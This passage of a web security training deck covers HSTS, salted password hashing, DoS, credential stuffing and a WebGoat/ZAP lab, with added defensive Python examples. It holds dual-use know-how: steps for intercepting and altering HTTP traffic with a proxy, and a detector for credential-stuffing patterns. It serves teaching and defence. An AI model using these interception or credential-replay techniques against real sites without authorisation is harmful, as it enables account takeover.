  • 38. Vulnerable Redirects • User requests the HTTP page; the response redirects to HTTPS • The 302 response itself travels over plain HTTP <-- vulnerability point: anyone on the path can rewrite it and keep the user on HTTP
  • 39. Secure Design for Communication • Use HTTPS throughout the web site • HTTP Strict Transport Security (HSTS): an opt-in security control; the website instructs a compatible browser to enable STS for the site • HSTS forces (for an enabled site): all communication over HTTPS; no insecure HTTP requests sent from the browser; no option for the user to override untrusted certificates
  • 40. Strict Transport Security • Browser prevents HTTP requests to HSTS site • Any request to site is “upgraded” to HTTPS • No clear text HTTP traffic ever sent to HSTS site • Browser assumes HTTPS for HSTS sites
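The HSTS behaviour of slides 39 and 40 worked through in code, as an added example that is not part of the original deck: the header the server sends, and a minimal model of the browser-side store that learns the policy and upgrades later http:// requests. `HstsCache`, `parse_hsts`, `demo`, the hostnames and the timestamps are constructed for this example; the directive names, the "only honour it over HTTPS" rule, expiry and the includeSubDomains scope follow the HSTS specification (RFC 6797).

```python
import time
from urllib.parse import urlsplit, urlunsplit

# What the server sends on every HTTPS response: one year, covering subdomains.
SECURE_HEADERS = {'Strict-Transport-Security': 'max-age=31536000; includeSubDomains'}


def parse_hsts(value):
    """Parse a Strict-Transport-Security value into (max_age seconds, includeSubDomains)."""
    max_age, include_sub = None, False
    for directive in value.split(';'):
        name, _, arg = directive.strip().partition('=')
        name = name.strip().lower()
        if name == 'max-age':
            max_age = int(arg.strip().strip('"'))
        elif name == 'includesubdomains':
            include_sub = True
    return max_age, include_sub


class HstsCache:
    """Minimal model of the browser-side HSTS store and the upgrade rule from slide 40."""

    def __init__(self):
        self.policies = {}   # host -> (expires_at, include_subdomains)

    def observe(self, url, headers, now=None):
        now = time.time() if now is None else now
        parts = urlsplit(url)
        value = headers.get('Strict-Transport-Security')
        # Browsers ignore the header on plain-HTTP responses: an attacker on the path could forge it.
        if parts.scheme != 'https' or not value:
            return
        max_age, include_sub = parse_hsts(value)
        if max_age is None:
            return
        if max_age == 0:                      # max-age=0 tells the browser to forget the host
            self.policies.pop(parts.hostname, None)
        else:
            self.policies[parts.hostname] = (now + max_age, include_sub)

    def is_hsts_host(self, host, now=None):
        now = time.time() if now is None else now
        labels = host.split('.')
        for i in range(len(labels)):
            policy = self.policies.get('.'.join(labels[i:]))
            if policy is None or policy[0] <= now:     # unknown or expired
                continue
            if i == 0 or policy[1]:                    # exact host, or a parent with includeSubDomains
                return True
        return False

    def rewrite(self, url, now=None):
        """Return the URL the browser would actually fetch: http:// becomes https:// for HSTS hosts."""
        parts = urlsplit(url)
        if parts.scheme != 'http' or not self.is_hsts_host(parts.hostname, now):
            return url
        netloc = parts.hostname if parts.port in (None, 80) else '%s:%d' % (parts.hostname, parts.port)
        return urlunsplit(('https', netloc, parts.path, parts.query, parts.fragment))


def demo():
    cache = HstsCache()
    t0 = 1_700_000_000
    cache.observe('http://site.com/login', SECURE_HEADERS, now=t0)      # ignored: not HTTPS
    before = cache.rewrite('http://site.com/profile', now=t0 + 1)
    cache.observe('https://site.com/login', SECURE_HEADERS, now=t0)     # policy learned
    return {
        'before': before,
        'after': cache.rewrite('http://site.com/profile', now=t0 + 1),
        'subdomain': cache.rewrite('http://www.site.com/', now=t0 + 1),
        'other': cache.rewrite('http://other.com/', now=t0 + 1),
        'expired': cache.rewrite('http://site.com/profile', now=t0 + 31536001),
    }
```

The `before` case is the redirect gap from slides 37 and 38: until the browser has seen the header over HTTPS once, the first http:// request still goes out in the clear. After that, the slide-37 redirect to http://site.com/profile is rewritten inside the browser before any packet is sent, which is why the session cookie no longer leaks.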
  • 41. Secure Data Storage & Protection
  • 42. Password Storage • Bad approaches: your own algorithm; md5 (a plain unsalted hash, not encryption); base64 encoding (reversible, not a hash at all); rot 13; sha1 • Good approach: PBKDF2 or bcrypt, + per-user salt
  • 43. What Are We Protecting? • Correct password hashing protects against: offline attacks on the password repository (brute force, rainbow tables) • It does not address: guessing easy passwords; password theft or disclosure; session hijacking; credential stuffing
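The "good approach" from slide 42 next to the unsalted hash it replaces, as an added example that is not part of the original deck. It uses PBKDF2-HMAC-SHA256 from Python's standard library (bcrypt, which the slide also lists, needs a third-party package); the storage format `pbkdf2_sha256$iterations$salt$hash`, the iteration count and the function names are constructed for this example, and the sample credentials are the ones from slide 50.

```python
import base64
import hashlib
import hmac
import os

ITERATIONS = 600_000   # assumption: tune so one hash costs roughly 100 ms on the login servers


def unsalted_md5(password):
    """The "bad approaches" column: same password -> same hash for every user, so one rainbow
    table lookup or one cracked hash exposes everybody who chose that password."""
    return hashlib.md5(password.encode('utf-8')).hexdigest()


def hash_password(password, iterations=ITERATIONS, salt=None):
    """PBKDF2-HMAC-SHA256 with a random 16-byte per-user salt. Salt and cost are stored with
    the hash, so the iteration count can be raised later without breaking old records."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac('sha256', password.encode('utf-8'), salt, iterations)
    return 'pbkdf2_sha256$%d$%s$%s' % (iterations,
                                       base64.b64encode(salt).decode('ascii'),
                                       base64.b64encode(digest).decode('ascii'))


def verify_password(password, stored):
    """Recompute with the stored salt and iterations, then compare in constant time."""
    algorithm, iterations, salt_b64, digest_b64 = stored.split('$')
    if algorithm != 'pbkdf2_sha256':
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    candidate = hashlib.pbkdf2_hmac('sha256', password.encode('utf-8'), salt, int(iterations))
    return hmac.compare_digest(candidate, expected)


if __name__ == '__main__':
    # Constructed credentials from the slide-50 example list.
    records = {name: hash_password(pw) for name, pw in
               (('joe', 'abc123'), ('sue', 'password1'), ('bob', 'MyP0n3y'))}
    for name, stored in records.items():
        print(name, stored)
    print(verify_password('MyP0n3y', records['bob']), verify_password('abc123', records['bob']))
```

Two users with the same password get different stored values, which is the whole point of the per-user salt, and the iteration count is what makes an offline brute-force attack on a stolen table slow. As slide 43 says, none of this helps when the password itself is `password1` or when the attacker already has it from another site's breach.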
  • 44. Architecture for Sensitive Data (diagram): browser --https://site.com--> web server --internal SSL--> database; monitor database queries & response size
  • 45. Encrypting Sensitive Data in Database (diagram: user data is encrypted under a customer/group encryption key; that key is stored in the database encrypted under a key-encrypting key held in a Hardware Security Module, which decrypts it for use) • Encryption within the database • Unique keys per data region • Key-encrypting keys • Hardware Security Modules
  • 47. Denial of Service Denial of Service (DOS) Distributed Denial of Service (DDOS)
  • 48. Denial of Service • Network DDoS: exhaust network bandwidth • Application layer DDoS (e.g. site.com/generateReport): exhaust server CPU/memory
  • 49. Application Denial of Service • Traditional Network DDoS: overwhelms the target with volume; exhausts bandwidth / capacity of network devices; requires a large number of machines; defenses: CDN, anti-DDoS services • Application DDoS: invokes computationally intense application functions; exhausts CPU / memory of web servers; requires few machines; defenses: few available, must customize
  • 50. Credential Stuffing (diagram): credentials stolen from a compromised server (joe: abc123, sue: password1, bob: MyP0n3y) are replayed against https://site.com/login; the users who reused them there (sue:password1, joe:abc123) are the ones the attacker gets into
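Credential stuffing from slide 50 seen from the defender's side, as an added example that is not part of the original deck: a small detector run over constructed login-audit lines. The log format, the IP addresses, the usernames, the thresholds and the `parse_line`/`find_stuffing_sources` functions are all constructed for this example. The signal it looks for is the one the slide's diagram implies: one source trying many different accounts about once each, which is what a replayed breach list looks like, as opposed to one account hammered many times.

```python
from collections import defaultdict

# Constructed login-audit lines (not real traffic). One source tries many different accounts
# once each; a normal user mistypes a password twice and then succeeds.
LOG_LINES = """
2024-04-22T10:00:01Z ip=203.0.113.7 user=joe result=fail
2024-04-22T10:00:02Z ip=203.0.113.7 user=sue result=success
2024-04-22T10:00:02Z ip=203.0.113.7 user=bob result=fail
2024-04-22T10:00:03Z ip=203.0.113.7 user=ann result=fail
2024-04-22T10:00:03Z ip=203.0.113.7 user=eve result=fail
2024-04-22T10:00:04Z ip=203.0.113.7 user=kim result=fail
2024-04-22T10:00:05Z ip=198.51.100.2 user=mike result=fail
2024-04-22T10:00:09Z ip=198.51.100.2 user=mike result=fail
2024-04-22T10:00:15Z ip=198.51.100.2 user=mike result=success
""".strip().splitlines()


def parse_line(line):
    """Turn 'timestamp key=value key=value ...' into a dict; None for lines that don't fit."""
    parts = line.split()
    if len(parts) < 4:
        return None
    event = {'ts': parts[0]}
    for field in parts[1:]:
        key, sep, value = field.partition('=')
        if sep:
            event[key] = value
    if not all(k in event for k in ('ip', 'user', 'result')):
        return None
    return event


def find_stuffing_sources(lines, min_distinct_users=5, max_attempts_per_user=2.0):
    """Flag source IPs that spray many distinct usernames with few tries each.

    Brute force against one account (one user, many tries) is a different pattern and is
    what per-account lockout handles; stuffing spreads one try across many accounts, so the
    attempts-to-distinct-users ratio stays close to 1.
    """
    by_ip = defaultdict(lambda: {'attempts': 0, 'users': set(), 'successes': 0})
    for line in lines:
        event = parse_line(line)
        if event is None:
            continue
        stats = by_ip[event['ip']]
        stats['attempts'] += 1
        stats['users'].add(event['user'])
        if event['result'] == 'success':
            stats['successes'] += 1
    flagged = {}
    for ip, stats in by_ip.items():
        distinct = len(stats['users'])
        if distinct >= min_distinct_users and stats['attempts'] / distinct <= max_attempts_per_user:
            flagged[ip] = {'attempts': stats['attempts'], 'distinct_users': distinct,
                           'successes': stats['successes'], 'users': sorted(stats['users'])}
    return flagged


if __name__ == '__main__':
    for ip, stats in find_stuffing_sources(LOG_LINES).items():
        print(ip, stats)
```

The successes from a flagged source are the actionable part: in the sample, `sue` logged in from the spraying IP, which is exactly the reused-password case the slide draws, and is the session to invalidate and the account to force through a reset or a step-up check. Real campaigns rotate source addresses, so the same grouping is usually also run per user-agent, per ASN or per device fingerprint rather than per IP alone.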
  • 51. Take Aways • Understand top security threats and anticipate potential malicious use of application to design secure code • Multiple controls possible to protect sensitive data in transit and storage • Understand emerging threats to plan for appropriate defenses • Use OWASP BWA Security Lab and learn more!
  • 54. Software • Vulnerable Server: OWASP’s Webgoat • Proxy Tool - OWASP’s ZAP (Zed Attack Proxy) • Browser • Virtual Machine: OWASP Broken Web App VM
  • 55. Test Connectivity to VM 1.Open Browser 2.Browse to your VM ip (listed in VM login page) • e.g. http://192.168.56.101 3.Should see OWASP BWA welcome page 4.Error? Check ip address of VM
  • 56. WebGoat • Click First Link - OWASP WebGoat version 5.3.x • Username / Password is guest / guest
  • 57. Understanding the Proxy • Proxy is the middle-man between browser and web server • Assists with traffic manipulation & inspection (Attacker’s Browser -> Web Proxy -> Web Server)
  • 58. Understanding the Proxy (diagram): on your computer, the primary OS runs the browser and the web proxy; the VM runs the web server
  • 59. Enabling Proxy 1.Open ZAP 2.Configure Firefox to use proxy 3.Resend Request 4.Confirm received by proxy 5.Forward to web server (vm)
  • 60. Using A Proxy • ZAP - Configure to listen on 8080
  • 61. Set Firefox Proxy • Set Firefox proxy to 8080: Preferences -> Advanced -> Network -> Settings • Set HTTP Proxy • Important - clear the “No Proxy for” line
  • 62. Confirm Setup Works • Refresh Web Browser • Go to ZAP • See site in left-hand column
  • 63. Intercepting Traffic • Add a “breakpoint” by right clicking on the page and choosing “Break...” • Refresh the webpage - it will hang • Modify the request as needed, then press the “Continue” button
  • 64. “Hello World” of Proxies • Lesson: General->Http Basic • Objective: enter your name into the text box; intercept with the proxy & change the entered name to a different value; receive the response & observe the modified value is reversed (diagram: browser sends Joe, the proxy changes it to Sue, the web server returns euS)